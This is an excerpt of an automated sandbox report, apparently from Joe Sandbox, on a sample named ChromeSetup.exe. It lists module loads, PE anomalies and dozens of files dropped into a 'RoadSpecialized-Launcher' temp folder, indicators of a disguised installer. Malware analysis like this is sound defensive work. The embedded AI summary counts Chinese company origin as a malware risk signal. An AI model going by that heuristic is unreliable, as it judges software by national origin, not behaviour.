Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: fastprox.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: ncobjapi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: mpclient.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: version.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: wmitomi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: mi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\svchost.exe Section loaded: qmgr.dll
Source: C:\Windows\System32\svchost.exe Section loaded: bitsperf.dll
Source: C:\Windows\System32\svchost.exe Section loaded: powrprof.dll
Source: C:\Windows\System32\svchost.exe Section loaded: xmllite.dll
Source: C:\Windows\System32\svchost.exe Section loaded: firewallapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: esent.dll
Source: C:\Windows\System32\svchost.exe Section loaded: umpdc.dll
Source: C:\Windows\System32\svchost.exe Section loaded: dnsapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: fwbase.dll
Source: C:\Windows\System32\svchost.exe Section loaded: wldp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ntmarta.dll
Source: C:\Windows\System32\svchost.exe Section loaded: profapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: flightsettings.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: netprofm.dll
Source: C:\Windows\System32\svchost.exe Section loaded: npmproxy.dll
Source: C:\Windows\System32\svchost.exe Section loaded: bitsigd.dll
Source: C:\Windows\System32\svchost.exe Section loaded: upnp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: winhttp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ssdpapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\svchost.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\svchost.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\svchost.exe Section loaded: netutils.dll
Source: C:\Windows\System32\svchost.exe Section loaded: appxdeploymentclient.dll
Source: C:\Windows\System32\svchost.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\svchost.exe Section loaded: wsmauto.dll
Source: C:\Windows\System32\svchost.exe Section loaded: miutils.dll
Source: C:\Windows\System32\svchost.exe Section loaded: wsmsvc.dll
Source: C:\Windows\System32\svchost.exe Section loaded: dsrole.dll
Source: C:\Windows\System32\svchost.exe Section loaded: pcwum.dll
Source: C:\Windows\System32\svchost.exe Section loaded: mi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: userenv.dll
Source: C:\Windows\System32\svchost.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: winhttp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: wkscli.dll
Source: C:\Windows\System32\svchost.exe Section loaded: netutils.dll
Source: C:\Windows\System32\svchost.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msv1_0.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ntlmshared.dll
Source: C:\Windows\System32\svchost.exe Section loaded: cryptdll.dll
Source: C:\Windows\System32\svchost.exe Section loaded: webio.dll
Source: C:\Windows\System32\svchost.exe Section loaded: mswsock.dll
Source: C:\Windows\System32\svchost.exe Section loaded: winnsi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\svchost.exe Section loaded: rasadhlp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: rmclient.dll
Source: C:\Windows\System32\svchost.exe Section loaded: usermgrcli.dll
Source: C:\Windows\System32\svchost.exe Section loaded: execmodelclient.dll
Source: C:\Windows\System32\svchost.exe Section loaded: propsys.dll
Source: C:\Windows\System32\svchost.exe Section loaded: coremessaging.dll
Source: C:\Windows\System32\svchost.exe Section loaded: twinapi.appcore.dll
Source: C:\Windows\System32\svchost.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\svchost.exe Section loaded: execmodelproxy.dll
Source: C:\Windows\System32\svchost.exe Section loaded: resourcepolicyclient.dll
Source: C:\Windows\System32\svchost.exe Section loaded: vssapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: vsstrace.dll
Source: C:\Windows\System32\svchost.exe Section loaded: samcli.dll
Source: C:\Windows\System32\svchost.exe Section loaded: samlib.dll
Source: C:\Windows\System32\svchost.exe Section loaded: es.dll
Source: C:\Windows\System32\svchost.exe Section loaded: bitsproxy.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\svchost.exe Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\svchost.exe Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\svchost.exe Section loaded: schannel.dll
Source: C:\Windows\System32\svchost.exe Section loaded: mskeyprotect.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ntasn1.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ncrypt.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\svchost.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\svchost.exe Section loaded: dpapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: mpr.dll
Source: C:\Users\user\Desktop\ChromeSetup.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: ChromeSetup.exe Static PE information: certificate valid
Source: ChromeSetup.exe Static file information: File size 81706848 > 1048576
Source: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\javaw.exe File opened: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\msvcr100.dll
Source: ChromeSetup.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: msvcr100.i386.pdb source: javaw.exe, 00000002.00000002.3392873090.000000006D031000.00000020.00000001.01000000.00000008.sdmp
Source: Binary string: c:\re\workspace\8-2-build-windows-i586-cygwin\jdk8u101\7261\build\windows-i586\jdk\objs\liblcms\lcms.pdb source: lcms.dll.0.dr
Source: Binary string: c:\re\workspace\8-2-build-windows-i586-cygwin\jdk8u101\7261\build\windows-i586\jdk\objs\libnio\nio.pdb source: javaw.exe, 00000002.00000002.3391820133.000000006CBC7000.00000002.00000001.01000000.0000000E.sdmp
Source: Binary string: c:\re\workspace\8-2-build-windows-i586-cygwin\jdk8u101\7261\build\windows-i586\jdk\objs\libt2k\t2k.pdb source: t2k.dll.0.dr
Source: Binary string: c:\re\workspace\8-2-build-windows-i586-cygwin\jdk8u101\7261\build\windows-i586\jdk\objs\libjava\java.pdb source: javaw.exe, 00000002.00000002.3392107747.000000006CC33000.00000002.00000001.01000000.0000000B.sdmp, java.dll.0.dr
Source: Binary string: c:\re\workspace\8-2-build-windows-i586-cygwin\jdk8u101\7261\build\windows-i586\jdk\objs\libnio\nio.pdbic source: javaw.exe, 00000002.00000002.3391820133.000000006CBC7000.00000002.00000001.01000000.0000000E.sdmp
Source: Binary string: msvcr120.i386.pdb source: javaw.exe, 00000002.00000002.3391610094.000000006CAD1000.00000020.00000001.01000000.0000000F.sdmp
Source: Binary string: c:\re\workspace\8-2-build-windows-i586-cygwin\jdk8u101\7261\build\windows-i586\jdk\objs\libjava\java.pdb'% source: javaw.exe, 00000002.00000002.3392107747.000000006CC33000.00000002.00000001.01000000.0000000B.sdmp, java.dll.0.dr
Source: Binary string: c:\re\workspace\8-2-build-windows-i586-cygwin\jdk8u101\7261\build\windows-i586\jdk\objs\libzip\zip.pdb source: javaw.exe, 00000002.00000002.3392010694.000000006CC0A000.00000002.00000001.01000000.0000000C.sdmp
Source: Binary string: msvcp120.i386.pdb source: javaw.exe, 00000002.00000002.3391479640.000000006CA51000.00000020.00000001.01000000.00000010.sdmp
Source: Binary string: c:\re\workspace\8-2-build-windows-i586-cygwin\jdk8u101\7261\build\windows-i586\jdk\objs\libawt\awt.pdb source: javaw.exe, 00000002.00000002.3391040673.000000006BF99000.00000002.00000001.01000000.00000014.sdmp
Source: Binary string: c:\re\workspace\8-2-build-windows-i586-cygwin\jdk8u101\7261\build\windows-i586\jdk\objs\libawt\awt.pdb8^ source: javaw.exe, 00000002.00000002.3391040673.000000006BF99000.00000002.00000001.01000000.00000014.sdmp
Source: Binary string: c:\re\workspace\8-2-build-windows-i586-cygwin\jdk8u101\7261\build\windows-i586\jdk\objs\libnet\net.pdb source: javaw.exe, 00000002.00000002.3391902623.000000006CBDD000.00000002.00000001.01000000.0000000D.sdmp
Source: Binary string: C:\Users\devuser\Documents\Visual Studio 2017\Projects\IBuilder\Release\NAct.pdb source: ChromeSetup.exe, 00000000.00000002.1074694666.0000000000420000.00000004.00000001.01000000.00000003.sdmp
Source: Binary string: c:\re\workspace\8-2-build-windows-i586-cygwin\jdk8u101\7261\build\windows-i586\jdk\objs\libbci\bci.pdb source: bci.dll.0.dr
Source: Binary string: c:\re\workspace\8-2-build-windows-i586-cygwin\jdk8u101\7261\build\windows-i586\jdk\objs\libverify\verify.pdb source: javaw.exe, 00000002.00000002.3392205561.000000006CC56000.00000002.00000001.01000000.0000000A.sdmp
Source: Binary string: c:\re\workspace\8-2-build-windows-i586-cygwin\jdk8u101\7261\build\windows-i586\jdk\objs\javaw_objs\javaw.pdb source: javaw.exe, 00000002.00000002.3382359288.00000000005FC000.00000002.00000001.01000000.00000007.sdmp, javaw.exe, 00000002.00000000.1024355035.00000000005FC000.00000002.00000001.01000000.00000007.sdmp
Source: Binary string: c:\re\workspace\8-2-build-windows-i586-cygwin\jdk8u101\7261\build\windows-i586\jdk\objs\liblcms\lcms.pdb* source: lcms.dll.0.dr
Source: Binary string: C:\re\workspace\8-2-build-windows-i586-cygwin\jdk8u101\7261\build\windows-i586\hotspot\windows_i486_compiler1\product\jvm.pdb source: javaw.exe, 00000002.00000002.3392485091.000000006CF21000.00000002.00000001.01000000.00000009.sdmp
Source: C:\Users\user\Desktop\ChromeSetup.exe Code function: 0_2_00406328 GetModuleHandleA,LoadLibraryA,GetProcAddress, 0_2_00406328
Source: NAct.dll.0.dr Static PE information: real checksum: 0x35f7b should be: 0x3cd72
Source: UAC.dll.0.dr Static PE information: real checksum: 0x0 should be: 0xde12
Source: uninst.exe.0.dr Static PE information: real checksum: 0x4debfea should be: 0x2011e
Source: Intel_Processor_Identification_Utility-Legacy.exe.0.dr Static PE information: section name: .didat
Source: jfxwebkit.dll.0.dr Static PE information: section name: .unwante
Source: prism_sw.dll.0.dr Static PE information: section name: _RDATA
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_083A326E push 8B6B54CFh; retf 5_2_083A3279
Source: msvcr100.dll.0.dr Static PE information: section name: .text entropy: 6.90903234258047
Source: msvcr120.dll.0.dr Static PE information: section name: .text entropy: 6.95576372950548
Source: msvcr100.dll0.0.dr Static PE information: section name: .text entropy: 6.90903234258047

Persistence and Installation Behavior

Source: Initial sample Joe Sandbox AI: Detected suspicious elements in PE signature: Multiple suspicious indicators: 1) Company is based in China (Hangzhou) which is a high-risk region for malware origin. 2) Significant temporal inconsistency between compilation date (2012) and certificate issuance (2024), suggesting possible certificate acquisition for an old/legacy code which is suspicious. 3) While the certificate issuer (Certum) is known and the certificate is technically valid, the large time gap (12+ years) between compilation and signing raises red flags about code authenticity and potential compromise. 4) The certificate is relatively new (issued Sept 2024) for a program compiled in 2012, suggesting possible attempt to legitimize old/suspicious code. The combination of Chinese origin, temporal inconsistencies, and attempt to certify very old code creates a high-risk profile.
Source: C:\Users\user\Desktop\ChromeSetup.exe File created: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\rmid.exe
Source: C:\Users\user\Desktop\ChromeSetup.exe File created: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\client\jvm.dll
Source: C:\Users\user\Desktop\ChromeSetup.exe File created: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\JavaAccessBridge.dll
Source: C:\Users\user\Desktop\ChromeSetup.exe File created: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\verify.dll
Source: C:\Users\user\Desktop\ChromeSetup.exe File created: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\jfr.dll
Source: C:\Users\user\Desktop\ChromeSetup.exe File created: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\plugin2\msvcr100.dll
Source: C:\Users\user\Desktop\ChromeSetup.exe File created: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\sunmscapi.dll
Source: C:\Users\user\Desktop\ChromeSetup.exe File created: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\javaws.exe
Source: C:\Users\user\Desktop\ChromeSetup.exe File created: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\jdwp.dll
Source: C:\Users\user\Desktop\ChromeSetup.exe File created: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\prism_common.dll
Source: C:\Users\user\Desktop\ChromeSetup.exe File created: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\instrument.dll
Source: C:\Users\user\Desktop\ChromeSetup.exe File created: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\dt_socket.dll
Source: C:\Users\user\Desktop\ChromeSetup.exe File created: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\java-rmi.exe
Source: C:\Users\user\Desktop\ChromeSetup.exe File created: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\resource.dll
Source: C:\Users\user\Desktop\ChromeSetup.exe File created: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\jp2native.dll
Source: C:\Users\user\Desktop\ChromeSetup.exe File created: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\splashscreen.dll
Source: C:\Users\user\Desktop\ChromeSetup.exe File created: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\javacpl.exe
Source: C:\Users\user\Desktop\ChromeSetup.exe File created: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\eula.dll
Source: C:\Users\user\Desktop\ChromeSetup.exe File created: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\fxplugins.dll
Source: C:\Users\user\Desktop\ChromeSetup.exe File created: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\java_crw_demo.dll
Source: C:\Users\user\Desktop\ChromeSetup.exe File created: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\WindowsAccessBridge-32.dll
Source: C:\Users\user\Desktop\ChromeSetup.exe File created: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\nio.dll
Source: C:\Users\user\Desktop\ChromeSetup.exe File created: C:\Users\user\AppData\Local\RoadSpecialized-Launcher\uninst.exe
Source: C:\Users\user\Desktop\ChromeSetup.exe File created: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\prism_d3d.dll
Source: C:\Users\user\Desktop\ChromeSetup.exe File created: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\ssv.dll
Source: C:\Users\user\Desktop\ChromeSetup.exe File created: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\servertool.exe
Source: C:\Users\user\Desktop\ChromeSetup.exe File created: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\lcms.dll
Source: C:\Users\user\Desktop\ChromeSetup.exe File created: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\tnameserv.exe
Source: C:\Users\user\Desktop\ChromeSetup.exe File created: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\javafx_font.dll
Source: C:\Users\user\Desktop\ChromeSetup.exe File created: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\sunec.dll
Source: C:\Users\user\Desktop\ChromeSetup.exe File created: C:\Users\user\AppData\Local\Temp\nscFD89.tmp\UAC.dll
Source: C:\Users\user\Desktop\ChromeSetup.exe File created: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\javaw.exe
Source: C:\Users\user\Desktop\ChromeSetup.exe File created: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\java.dll
Source: C:\Users\user\Desktop\ChromeSetup.exe File created: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\fontmanager.dll
Source: C:\Users\user\Desktop\ChromeSetup.exe File created: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\deploy.dll
Source: C:\Users\user\Desktop\ChromeSetup.exe File created: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\hprof.dll
Source: C:\Users\user\Desktop\ChromeSetup.exe File created: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\jjs.exe
Source: C:\Users\user\Desktop\ChromeSetup.exe File created: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\unpack.dll
Source: C:\Users\user\Desktop\ChromeSetup.exe File created: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\jawt.dll
Source: C:\Users\user\Desktop\ChromeSetup.exe File created: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\RoadSpecialized-Launcher.exe
Source: C:\Users\user\Desktop\ChromeSetup.exe File created: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\jsound.dll
Source: C:\Users\user\Desktop\ChromeSetup.exe File created: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\jp2iexp.dll
Source: C:\Users\user\Desktop\ChromeSetup.exe File created: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\javafx_iio.dll
Source: C:\Users\user\Desktop\ChromeSetup.exe File created: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\jfxwebkit.dll
Source: C:\Users\user\Desktop\ChromeSetup.exe File created: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\prism_sw.dll
Source: C:\Users\user\Desktop\ChromeSetup.exe File created: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\decora_sse.dll
Source: C:\Users\user\Desktop\ChromeSetup.exe File created: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\net.dll
Source: C:\Users\user\Desktop\ChromeSetup.exe File created: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\glib-lite.dll
Source: C:\Users\user\Desktop\ChromeSetup.exe File created: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\jli.dll
Source: C:\Users\user\Desktop\ChromeSetup.exe File created: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\j2pkcs11.dll
Source: C:\Users\user\Desktop\ChromeSetup.exe File created: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\jabswitch.exe
Source: C:\Users\user\Desktop\ChromeSetup.exe File created: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\msvcp120.dll
Source: C:\Users\user\Desktop\ChromeSetup.exe File created: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\glass.dll
Source: C:\Users\user\Desktop\ChromeSetup.exe File created: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\msvcr120.dll
Source: C:\Users\user\Desktop\ChromeSetup.exe File created: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\kinit.exe
Source: C:\Users\user\Desktop\ChromeSetup.exe File created: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\bci.dll
Source: C:\Users\user\Desktop\ChromeSetup.exe File created: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\npt.dll
Source: C:\Users\user\Desktop\ChromeSetup.exe File created: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\WindowsAccessBridge.dll
Source: C:\Users\user\Desktop\ChromeSetup.exe File created: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\Intel_Processor_Identification_Utility-Legacy.exe
Source: C:\Users\user\Desktop\ChromeSetup.exe File created: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\javacpl.cpl
Source: C:\Users\user\Desktop\ChromeSetup.exe File created: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\jsdt.dll
Source: C:\Users\user\Desktop\ChromeSetup.exe File created: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\jaas_nt.dll
Source: C:\Users\user\Desktop\ChromeSetup.exe File created: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\w2k_lsa_auth.dll
Source: C:\Users\user\Desktop\ChromeSetup.exe File created: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\jpeg.dll
Source: C:\Users\user\Desktop\ChromeSetup.exe File created: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\policytool.exe
Source: C:\Users\user\Desktop\ChromeSetup.exe File created: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\java.exe
Source: C:\Users\user\Desktop\ChromeSetup.exe File created: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\awt.dll
Source: C:\Users\user\Desktop\ChromeSetup.exe File created: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\keytool.exe
Source: C:\Users\user\Desktop\ChromeSetup.exe File created: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\dtplugin\npdeployJava1.dll
Source: C:\Users\user\Desktop\ChromeSetup.exe File created: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\orbd.exe
Source: C:\Users\user\Desktop\ChromeSetup.exe File created: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\javafx_font_t2k.dll
Source: C:\Users\user\Desktop\ChromeSetup.exe File created: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\zip.dll
Source: C:\Users\user\Desktop\ChromeSetup.exe File created: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\jp2ssv.dll
Source: C:\Users\user\Desktop\ChromeSetup.exe File created: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\rmiregistry.exe
Source: C:\Users\user\Desktop\ChromeSetup.exe File created: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\ssvagent.exe
Source: C:\Users\user\Desktop\ChromeSetup.exe File created: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\j2pcsc.dll
Source: C:\Users\user\Desktop\ChromeSetup.exe File created: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\kcms.dll
Source: C:\Users\user\Desktop\ChromeSetup.exe File created: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\JAWTAccessBridge-32.dll
Source: C:\Users\user\Desktop\ChromeSetup.exe File created: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\dtplugin\deployJava1.dll
Source: C:\Users\user\Desktop\ChromeSetup.exe File created: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\ktab.exe
Source: C:\Users\user\Desktop\ChromeSetup.exe File created: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\dt_shmem.dll
Source: C:\Users\user\Desktop\ChromeSetup.exe File created: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\jsoundds.dll
Source: C:\Users\user\Desktop\ChromeSetup.exe File created: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\klist.exe
Source: C:\Users\user\Desktop\ChromeSetup.exe File created: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\plugin2\npjp2.dll
Source: C:\Users\user\Desktop\ChromeSetup.exe File created: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\unpack200.exe
Source: C:\Users\user\Desktop\ChromeSetup.exe File created: C:\Users\user\AppData\Local\Temp\nscFD89.tmp\NAct.dll Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe File created: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\JAWTAccessBridge.dll Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe File created: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\JavaAccessBridge-32.dll Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe File created: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\t2k.dll Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe File created: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\management.dll Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe File created: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\jp2launcher.exe Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe File created: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\mlib_image.dll Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe File created: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\pack200.exe Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe File created: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\wsdetect.dll Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe File created: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\jfxmedia.dll Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe File created: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\msvcr100.dll Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe File created: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\gstreamer-lite.dll Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe File created: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\dcpr.dll Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe File created: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\javacpl.cpl Jump to dropped file
